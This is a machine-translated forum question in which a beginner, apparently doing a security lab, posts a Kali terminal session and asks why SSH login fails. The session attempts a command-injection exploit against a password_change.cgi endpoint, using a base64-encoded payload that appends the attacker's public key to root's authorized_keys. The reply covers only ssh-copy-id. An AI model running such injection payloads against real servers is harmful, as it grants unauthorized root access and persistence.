网络安全新手请和我一起。只是一个学习情况而已,为了继续前进,我尽我所能,它要求我准备和编码有效负载等。我做了这 4 个步骤。
为什么生成公钥/私钥 rsa 密钥对后,输入密码后仍然无法 ssh 访问服务器? -[电子邮件受保护]:权限被拒绝(公钥,密码)我输入了它要求的生成密钥,但没有运气,而且 foobar1 也不起作用,(公钥和密码)的组合也不起作用。我已经尝试过了; ssh-copy-id -i ~/.ssh/id_rsa[电子邮件受保护](不起作用,一直要求输入密码)底部的最后一部分让我感到困惑!我该怎么写呢?有人可以提供清晰度/指导来解决它吗?我在终端上提供了整个分步过程,如下所示:
root@kali:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/.ssh/id_rsa
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:Hp6lH+aI8JAlpRWQ1b8DGzxWOwbu6YGq6znjzP6sDKs root@kali
The key's randomart image is:
+---[RSA 3072]----+
| .+o. |
| . .o . |
| oo + . |
| + B = |
| o .+SB.o |
| +.o==o |
|. +. .=.o. |
| *oo.+ ..= . |
|E+%Bo o . o |
+----[SHA256]-----+
root@kali:~# echo -n '$COMMAND' | base64 -w 0
JENPTU1BTkQ=root@kali:~# PAYLOAD="echo%20$(echo "JENPTU1BTkQ=" | base64 -d)|sh"
root@kali:~# PAYLOAD=$(echo $PAYLOAD | sed 's/%/%25/g; s/ /%20/g; s/|/%7C/g')
root@kali:~# PAYLOAD="echo%20JENPTU1BTkQ=%3D%7Cbase64%20-d%7Csh"
root@kali:~# curl -ks "http://192.168.6.2:10000/password_change.cgi" -d user=root&pam=&expired=2;
PAYLOAD="echo%20JENPTU1BTkQ=%3D%7Cbase64%20-d%7Csh"&old=foobar&new1=foobar1&new2=foobar1
[1] 1922
[2] 1923
[3] 1924
[4] 1925
[5] 1926
[1] Done curl -ks "http://192.168.6.2:10000/password_change.cgi" -d user=root
[2] Done pam=
[3] Done PAYLOAD="echo%20Q09NTUFORA==%3D%7Cbase64%20-d%7Csh"
[4]- Done old=foobar
[5]+ Done new1=foobar1
root@kali:~# ssh [email protected]
[email protected]'s password: Hp6lH+aI8JAlpRWQ1b8DGzxWOwbu6YGq6znjzP6sDKs
Permission denied, please try again.
[email protected]: Permission denied (publickey,password).
(attempted to copy key to target server)
root@kali:~# ssh-copy-id [email protected]
/usr/bin/ssh-copy-id: INFO: Source of key(s) to be installed: "/root/.ssh/id_rsa.pub"
/usr/bin/ssh-copy-id: INFO: attempting to log in with the new key(s), to filter out any that are already installed
/usr/bin/ssh-copy-id: INFO: 1 key(s) remain to be installed -- if you are prompted now it is to install the new keys
[email protected]'s password: foobar1
Permission denied, please try again.
运行以下命令来利用 Web 服务并添加 SSH 密钥:
准备将在目标服务器中执行的命令以添加 SSH 密钥 COMMAND="echo '$(cat ~/.ssh/id_rsa.pub)' >> /root/.ssh/authorized_keys" (完成) 准备和编码有效负载 PAYLOAD="echo%20$(echo "$COMMAND" | base64 -w 0)|base64%20-d|sh" (完成) 利用 RCE 漏洞并执行有效负载(非常混乱,部分看起来没有必要) - shell 尝试在后台运行几件事(大多数只是在子 shell 中将变量设置为特定值,然后退出,并且变量和值丢失)curl -ks "http://192.168.6.2: 10000/password_change.cgi" -d "user=root&pam=&expired=2;$PAYLOAD&old=foobar&new1=foobar1&new2=foobar1" -H "引荐来源:http://192.168.6.2:10000"
答案1
ssh-copy-id使用 SSH 将公钥复制到~/.ssh/authorized_keys目标系统上目标用户帐户的文件中。
为此,您需要为其提供通过 ssh 登录到目标系统上的目标用户帐户的方法。
这意味着您需要输入密码一次允许其连接;之后您就可以仅使用 SSH 密钥登录。
我已经剪掉了其余的乱码,因为看起来您正在尝试使用某种未指定的 http 漏洞来尝试获得对系统的 root 访问权限,这远远超出了您实际问题的范围。